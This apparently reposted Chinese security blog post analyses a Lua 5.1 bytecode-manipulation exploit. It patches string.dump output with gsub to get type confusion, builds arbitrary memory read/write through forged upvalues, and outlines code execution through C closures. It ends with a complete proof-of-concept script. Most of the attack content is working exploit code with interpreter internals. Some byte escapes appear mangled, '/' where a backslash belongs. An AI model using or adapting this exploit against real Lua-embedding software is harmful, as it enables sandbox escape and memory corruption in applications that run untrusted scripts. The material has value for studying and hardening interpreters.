


参考 https://gist.github.com/corsix/6575486

0x00 LUA数据泄露


asnum = loadstring(string.dump(function(x)   for i = x, x, 0 do     return i   end end):gsub("/96%z%z/128", "/22/0/0/128"))



asnum函数可以将任意LUA对象转换为数字。(注:LUA5.1 64bitLinux环境)gsub函数将字节码 /96%z%z/128 替换为 /22/0/0/128 ,如下:

0071  60000080           [4] forprep    1   1        ; to [6] 0075  1E010001           [5] return     4   2       0079  5F40FF7F           [6] forloop    1   -2       ; to [5] if loop

执行gsub函数后,forprep指令被替换为JMP to [6],LUA解释器forprep指令对应代码如下:

case OP_FORPREP: {         const TValue *init = ra;         const TValue *plimit = ra+1;         const TValue *pstep = ra+2;         L->savedpc = pc;  /* next steps may throw errors */         if (!tonumber(init, ra))           luaG_runerror(L, LUA_QL("for") " initial value must be a number");         else if (!tonumber(plimit, ra+1))           luaG_runerror(L, LUA_QL("for") " limit must be a number");         else if (!tonumber(pstep, ra+2))           luaG_runerror(L, LUA_QL("for") " step must be a number");         setnvalue(ra, luai_numsub(nvalue(ra), nvalue(pstep)));         dojump(L, pc, GETARG_sBx(i));         continue;


case OP_FORLOOP: {         lua_Number step = nvalue(ra+2);         lua_Number idx = luai_numadd(nvalue(ra), step); /* increment index */         lua_Number limit = nvalue(ra+1);         if (luai_numlt(0, step) ? luai_numle(idx, limit)                                 : luai_numle(limit, idx)) {           dojump(L, pc, GETARG_sBx(i));  /* jump back */           setnvalue(ra, idx);  /* update internal index... */           setnvalue(ra+3, idx);  /* ...and external index */         }         continue;       }

forloop指令直接将循环参数转换为lua_Number(double)类型,(因为正常情况下forprep已经检查过类型了),然后执行加法(+ 0),执行dojump return x;返回lua_Number。


Value(64bit) tt(32bit) padd(32bit)
GCObject *gc; -> TString* LUA_TSTRING
GCObject *gc; -> Closure* LUA_TFUNCTION

0x01 LUA任意内存读/写

read_mem = loadstring(string.dump(function(mem_addr)    local magic=nil   local function middle()     local f2ii, asnum = f2ii, asnum     local lud, upval     local function inner()       magic = "01234567"       local lo,hi = f2ii(mem_addr)       upval = "commonhead16bits"..ub4(lo)..ub4(hi)       lo,hi = f2ii(asnum(upval));lo = lo+24       magic = magic..ub4(lo)..ub4(hi)..ub4(lo)..ub4(hi)     end     inner()     return asnum(magic)   end   magic = middle()   return magic end):gsub("(/164%z%z%z)....", "%1/0/0/128/1", 1))  --> move 0,3


0785  A4000000           [1] closure    2   0        ; 2 upvalues 0789  00008000           [2] move       0   1       078D  00000000           [3] move       0   0       0791  C0000001           [4] move       3   2       0795  DC808000           [5] call       3   1   2   0799  40008001           [6] move       1   3       079D  5E000001           [7] return     1   2

LUA使用CLOSURE A Bx指令创建函数的一个实例(或闭包)。Bx是要实例化的函数在函数原型表中的函数编号。

closure 2 0 :创建0号函数对象,结果保存到2号寄存器,具体代码如下:

case OP_CLOSURE: {         Proto *p;         Closure *ncl;         int nup, j;         p = cl->p->p[GETARG_Bx(i)];         nup = p->nups;         ncl = luaF_newLclosure(L, nup, cl->env);         ncl->l.p = p;         for (j=0; j<nup; j++, pc++) {           if (GET_OPCODE(*pc) == OP_GETUPVAL)             ncl->l.upvals[j] = cl->upvals[GETARG_B(*pc)];           else {             lua_assert(GET_OPCODE(*pc) == OP_MOVE);             ncl->l.upvals[j] = luaF_findupval(L, base + GETARG_B(*pc));           }         }         setclvalue(L, ra, ncl);         Protect(luaC_checkGC(L));         continue;       }

LUA内部使用Proto 数据结构表示函数原型,记录函数的一些基本信息。LUA使用UpVal数据结构记录当前函数外部变量引用情况。如:

function parent()   local upval=nil   function child() upval="child" end   child()   print(upval) --output string child end

父函数定义一个局部变量upval,子函数直接使用了该变量,此时父函数在创建闭包时会初始化upval列表,LUA编译器生成CLOSURE A Bx指令后,会自动插入MOVE 0, B伪指令,R(B)指示带入子函数的Upval寄存器编号。

0785  A4000000           [1] closure    2   0        ; 2 upvalues 0789  00008000           [2] move       0   1       078D  00000000           [3] move       0   0       0791  C0000001           [4] move       3   2     --R(3) = R(2) 0795  DC808000           [5] call       3   1   2  --Call R(3)

执行 gsub("(/164%z%z%z)....", "%1/0/0/128/1", 1)) 【%1指示第一匹配项】,将 move 0 1 替换为 move 0 3 指令,而寄存器3对应的是一个CLOSURE对象。因此middle及inner函数里面的magic实际执行middle函数对象。

LUA使用CALL A B C字节指令处理函数调用,寄存器 R(A)持有要被调用的函数对象的引用。函数参数置于R(A)之后的寄存器中。参数个数(B-1),返回值个数(C-1)。如call 3 3 1 表示R(3)->CLOSURE 参数2个分别是R(4)、R(5),无返回值。

case OP_CALL: {         int b = GETARG_B(i);         int nresults = GETARG_C(i) - 1;         if (b != 0) L->top = ra+b;  /* else previous instruction set top */         L->savedpc = pc;         switch (luaD_precall(L, ra, nresults)) {           case PCRLUA: {             nexeccalls++;             goto reentry;  /* restart luaV_execute over new Lua function */           }


#define inc_ci(L) /   ((L->ci == L->end_ci) ? growCI(L) : /    (condhardstacktests(luaD_reallocCI(L, L->size_ci)), ++L->ci))

lua_State->ci的call info for current function,每调用一个函数增加一个ci,RETRUN减少ci,CallInfo数据结构如下:

typedef struct CallInfo {   StkId base;  /* base for this function */   StkId func;  /* function index in the stack */   StkId top;  /* top for this function */   const Instruction *savedpc;   int nresults;  /* expected number of results from this function */   int tailcalls;  /* number of tail calls lost under this entry */ } CallInfo;

其中CallInfo 的func在luaD_precall函数中初始化指向R(A)对象

我们跟踪下inner函数大致流程:magic Upval通过修改字节码方式指向了middle函数,inner函数在返回前将magic赋值为一个字符串,然后执行OP_RETURN指令返回middle函数。OP_RETURN最终调用luaD_poscall执行L->ci–,切换回上层函数调用CallInfo信息,然后goto reentry,如下:

LClosure *cl;  reentry:  /* entry point */     lua_assert(isLua(L->ci));     pc = L->savedpc; cl = &clvalue(L->ci->func)->l; base = L->base; k = cl->p->k;

其中的&clvalue(L->ci->func)直接将ci->func转换为Closure*指针,但inner函数已经将ci->func对象修改为一个字符串对象,此后k = cl->p->k行获取函数原型的常量表。




magic = magic..ub4(lo)..ub4(hi)..ub4(lo)..ub4(hi)


lo,hi = f2ii(asnum(upval));lo = lo+24



typedef struct Proto {   CommonHeader;   TValue *k;  /* constants u



typedef struct UpVal {   CommonHeader;   TValue *v;  /* points to stack or to its own value */

此后执行middle函数执行return asnum(magic)语句,对应字节码如下:

MOVE        5  1 GETUPVAL    6  0    ; magic TAILCALL    5  2  0 RETURN      5  0

R(5) = R(1) = asnum函数对象,执行GETUPVAL 6 0 ,并将R(6)作为函数参数1调用asnum函数,最后返回asnum读取结果。

case OP_GETUPVAL: {   int b = GETARG_B(i);   setobj2s(L, ra, cl->upvals[b]->v);   continue;

GETUPVAL 6 0 其中b=0因此cl->upvals[b]->v正是我们构造的内存地址,setobj2s函数从对应的内存地址复制数据到R(6),此后通过asnum读取内容,实现任意内存地址读操作。同理如果在middle函数中对magic进行赋值,即可实现对任意地址写内存(实际会写8字节数值以及4字节的tt类型)

0x02 代码执行


/* if is a C function, call it */     CallInfo *ci;     int n;     ci = inc_ci(L);  /* now `enter' new function */     ci->func = restorestack(L, funcr);     L->base = ci->base = ci->func + 1;     ci->top = L->top + LUA_MINSTACK;     ci->nresults = nresults;     lua_unlock(L);     n = (*curr_func(L)->c.f)(L);  /* do the actual call */

LUA使用lua_pushcclosure函数创建C函数闭包对象,LUA基础库luaB_cowrap会调用lua_pushcclosure,创建一个CClosure *对象,具体LUA脚本如下:

co = coroutine.wrap(function() end)




0x03 附:POC代码

asnum = loadstring(string.dump(function(x)   for i = x, x, 0 do     return i   end end):gsub("/96%z%z/128", "/22/0/0/128"))  ub4 = function(x) -- Convert little endian uint32_t to char[4]   local b0 = x % 256; x = (x - b0) / 256   local b1 = x % 256; x = (x - b1) / 256   local b2 = x % 256; x = (x - b2) / 256   local b3 = x % 256   return string.char(b0, b1, b2, b3) end  f2ii = function(x) -- Convert double to uint32_t[2]   if x == 0 then return 0, 0 end   if x < 0 then x = -x end    local e_lo, e_hi, e, m = -1075, 1023   while true do -- this loop is math.frexp     e = (e_lo + e_hi)     e = (e - (e % 2)) / 2     m = x / 2^e     if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end   end    if e+1023 <= 1 then     m = m * 2^(e+1074)     e = 0   else     m = (m - 0.5) * 2^53     e = e + 1022   end    local lo = m % 2^32   m = (m - lo) / 2^32   local hi = m + e * 2^20   return lo, hi end  ii2f = function(lo, hi) -- Convert uint32_t[2] to double   local m = hi % 2^20   local e = (hi - m) / 2^20   m = m * 2^32 + lo    if e ~= 0 then     m = m + 2^52   else     e = 1   end   return m * 2^(e-1075) end  read_mem = loadstring(string.dump(function(mem_addr) -- AAAABBBB 1094795585 1111638594   local magic=nil   local function middle()     local f2ii, asnum = f2ii, asnum     local lud, upval     local function inner()       magic = "01234567"       local lo,hi = f2ii(mem_addr)       upval = "commonhead16bits"..ub4(lo)..ub4(hi)       lo,hi = f2ii(asnum(upval));lo = lo+24       magic = magic..ub4(lo)..ub4(hi)..ub4(lo)..ub4(hi)     end     inner()     return asnum(magic)   end   magic = middle()   return magic end):gsub("(/164%z%z%z)....", "%1/0/0/128/1", 1))  --> move 0,3  x="AAAABBBB" l,h=f2ii(asnum(x)) x=ii2f(l+24,h) print(f2ii(read_mem(x)))
原文  http://www.evil0x.com/posts/12714.html